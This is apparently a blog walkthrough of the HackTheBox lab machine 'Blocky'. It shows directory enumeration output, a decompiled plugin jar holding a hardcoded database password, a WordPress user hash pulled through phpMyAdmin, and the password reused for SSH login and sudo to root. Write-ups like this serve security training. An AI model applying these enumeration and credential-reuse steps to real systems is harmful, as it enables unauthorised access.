HackTheBox “Blocky” Walkthrough
9 min readJul 29, 2023
Blocky, an easy-level Linux OS machine on HackTheBox, it definitely needed some patience while enumeration. Can you believe there were these sneaky Java Jar files hidden away in the /plugins path? Well, luckily, I stumbled upon them and got my hands on some credentials that a user on the box had reused. Thanks to those, I managed to snag SSH access and dive deeper into the fun!
But the real excitement kicked in when I discovered that the user had been granted some cool sudo powers. With the right password, they could run any command as root! So, I didn’t waste a second and made the most of it by using “sudo su.” And voilà, I got root privileges!
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:
While visiting the target on port 80, we needed to add target’s IP and the domain to /etc/hosts.
Nothing interesting, so, the subsequent action involves executing a Feroxbuster scan to identify concealed files or directories:
└─$ sudo feroxbuster -u http://blocky.htb -d 2 -C 404,403,405,500
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://blocky.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
💢 Status Code Filters │ [404, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 2
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 11l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 313c http://blocky.htb/wp-content => http://blocky.htb/wp-content/
301 GET 9l 28w 311c http://blocky.htb/wp-admin => http://blocky.htb/wp-admin/
200 GET 209l 846w 5836c http://blocky.htb/wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js
200 GET 225l 400w 3646c http://blocky.htb/wp-content/themes/twentyseventeen/assets/css/ie8.css
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-widget.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/nav-menu.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-curl.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-matchesmapregex.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/deprecated.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-customize-manager.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-meta-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-embed.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-proxy.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/taxonomy.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class.wp-dependencies.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/option.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-load.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/kses.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-feed-cache-transient.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-network.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-post.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-blogs.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-cookie.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-pop3.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-ajax-response.php
301 GET 9l 28w 310c http://blocky.htb/plugins => http://blocky.htb/plugins/
200 GET 0l 0w 0c http://blocky.htb/wp-includes/default-constants.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-editor.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-locale-switcher.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/shortcodes.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/user.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/author-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/plugin.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-user.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/media-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-network-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-term.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/load.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/compat.php
301 GET 9l 28w 313c http://blocky.htb/javascript => http://blocky.htb/javascript/
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-deprecated.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-theme.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/wp-db.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/atomlib.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-comment-query.php
200 GET 43l 43w 1045c http://blocky.htb/wp-includes/wlwmanifest.xml
301 GET 9l 28w 307c http://blocky.htb/wiki => http://blocky.htb/wiki/
301 GET 9l 28w 313c http://blocky.htb/phpmyadmin => http://blocky.htb/phpmyadmin/
301 GET 9l 28w 314c http://blocky.htb/wp-includes => http://blocky.htb/wp-includes/
200 GET 326l 1144w 10330c http://blocky.htb/wp-content/themes/twentyseventeen/assets/js/html5.js
200 GET 249l 928w 7682c http://blocky.htb/wp-content/themes/twentyseventeen/assets/js/global.js
200 GET 31l 90w 683c http://blocky.htb/wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js
200 GET 2l 281w 10056c http://blocky.htb/wp-includes/js/jquery/jquery-migrate.min.js
301 GET 0l 0w 0c http://blocky.htb/index.php/ => http://blocky.htb/
200 GET 6l 1435w 97184c http://blocky.htb/wp-includes/js/jquery/jquery.js
200 GET 4282l 8552w 82584c http://blocky.htb/wp-content/themes/twentyseventeen/style.css
200 GET 1l 9w 1398c http://blocky.htb/wp-includes/js/wp-embed.min.js
200 GET 0l 0w 0c http://blocky.htb/wp-includes/query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/date.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/http.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/rewrite.php
200 GET 70l 199w 2397c http://blocky.htb/wp-login.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/post-thumbnail-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/link-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/functions.wp-styles.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-site-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-dependency.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/post-formats.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/pluggable-deprecated.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/bookmark.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/post-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-roles.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-widget-factory.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-role.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-site.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-rewrite.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/capabilities.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/category-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-taxonomy.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/pluggable.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-comment.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/bookmark-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-user-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-customize-nav-menus.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-error.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-list-util.php
200 GET 1l 2522w 52657c http://blocky.htb/index.php/wp-json
200 GET 313l 3592w 52227c http://blocky.htb/
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-hook.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-walker.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-tax-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/functions.wp-scripts.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-requests.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-admin-bar.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/cache.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/embed.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/canonical.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-response.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-default-constants.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-phpmailer.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/formatting.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-post-type.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/revision.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-encoding.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-session-tokens.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/admin-bar.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/cron.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-phpass.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-customize-widgets.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-metadata-lazyloader.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-oembed-controller.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/category.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-json.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/comment.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-oembed.php
200 GET 1l 4w 29c http://blocky.htb/wp-includes/ms-files.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-streams.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-functions.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/feed.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/rest-api.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/theme.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-smtp.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/widgets.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/version.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-term-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/l10n.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-locale.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/post.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/meta.php
301 GET 9l 28w 321c http://blocky.htb/wp-content/plugins => http://blocky.htb/wp-content/plugins/
301 GET 9l 28w 315c http://blocky.htb/wp-admin/css => http://blocky.htb/wp-admin/css/
301 GET 9l 28w 323c http://blocky.htb/phpmyadmin/templates => http://blocky.htb/phpmyadmin/templates/
301 GET 9l 28w 316c http://blocky.htb/phpmyadmin/js => http://blocky.htb/phpmyadmin/js/
301 GET 9l 28w 320c http://blocky.htb/phpmyadmin/themes => http://blocky.htb/phpmyadmin/themes/
301 GET 9l 28w 316c http://blocky.htb/plugins/files => http://blocky.htb/plugins/files/
301 GET 9l 28w 317c http://blocky.htb/phpmyadmin/doc => http://blocky.htb/phpmyadmin/doc/
301 GET 9l 28w 317c http://blocky.htb/plugins/assets => http://blocky.htb/plugins/assets/
301 GET 9l 28w 317c http://blocky.htb/phpmyadmin/sql => http://blocky.htb/phpmyadmin/sql/
401 GET 14l 54w 457c http://blocky.htb/phpmyadmin/setup
301 GET 9l 28w 320c http://blocky.htb/phpmyadmin/locale => http://blocky.htb/phpmyadmin/locale/
301 GET 9l 28w 320c http://blocky.htb/wp-content/themes => http://blocky.htb/wp-content/themes/
200 GET 0l 0w 0c http://blocky.htb/wp-includes/comment-template.php
301 GET 9l 28w 320c http://blocky.htb/wp-admin/includes => http://blocky.htb/wp-admin/includes/
301 GET 9l 28w 314c http://blocky.htb/wp-admin/js => http://blocky.htb/wp-admin/js/
301 GET 9l 28w 318c http://blocky.htb/wp-admin/images => http://blocky.htb/wp-admin/images/
301 GET 9l 28w 320c http://blocky.htb/javascript/jquery => http://blocky.htb/javascript/jquery/
301 GET 9l 28w 319c http://blocky.htb/wp-admin/network => http://blocky.htb/wp-admin/network/
301 GET 9l 28w 317c http://blocky.htb/wp-admin/maint => http://blocky.htb/wp-admin/maint/
[####################] - 2m 210280/210280 0s found:151 errors:141227
[####################] - 2m 30000/30000 332/s http://blocky.htb/
[####################] - 2m 30000/30000 333/s http://blocky.htb/wp-content/
[####################] - 2m 30000/30000 308/s http://blocky.htb/wp-admin/
[####################] - 13s 30000/30000 2254/s http://blocky.htb/wp-includes/ => Directory listing
[####################] - 2m 30000/30000 312/s http://blocky.htb/plugins/
[####################] - 89s 30000/30000 336/s http://blocky.htb/javascript/
[####################] - 2m 30000/30000 317/s http://blocky.htb/wiki/
[####################] - 2m 30000/30000 319/s http://blocky.htb/phpmyadmin/While exploring numerous directories, I stumbled upon a particular plugin/files.
To proceed, we need to download the BlockyCore.jar file for decompilation. We can achieve this by using an online decompiler. Once we perform the decompilation, we will obtain the results below.
//
// Decompiled by Procyon v0.5.36
//
package com.myfirstplugin;
public class BlockyCore
{
public String sqlHost;
public String sqlUser;
public String sqlPass;
public BlockyCore() {
this.sqlHost = "localhost";
this.sqlUser = "root";
this.sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
}
public void onServerStart() {
}
public void onServerStop() {
}
public void onPlayerJoin() {
this.sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
}
public void sendMessage(final String username, final String message) {
}
}The results include login credentials for an SQL user (sqluser) and corresponding password (sqlpass).
sqlUser = "root";
sqlPass = "8YsqfCTnvxAUeduzjNSXe22";Among the results yielded by Feroxbuster is “/phpmyadmin.”
We will use the credentials found in the jar file.
After having a look around, we find an entry inside wordpress/wp_users tab.
We find the following user id.
SELECT * FROM `wp_users`
notch
$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/Exploitation:
Since we have port 22 SSH is open, let’s try using the username notch and the password found in the jar file.
Privilege Escalation:
When attempting to list the privileges for the “notch” user using sudo -l, a password prompt is triggered. Subsequently, it worked by providing the password retrieved from the jar file once more.
And we are allowed to perform all, so, let’s switch to root.
Cheers.
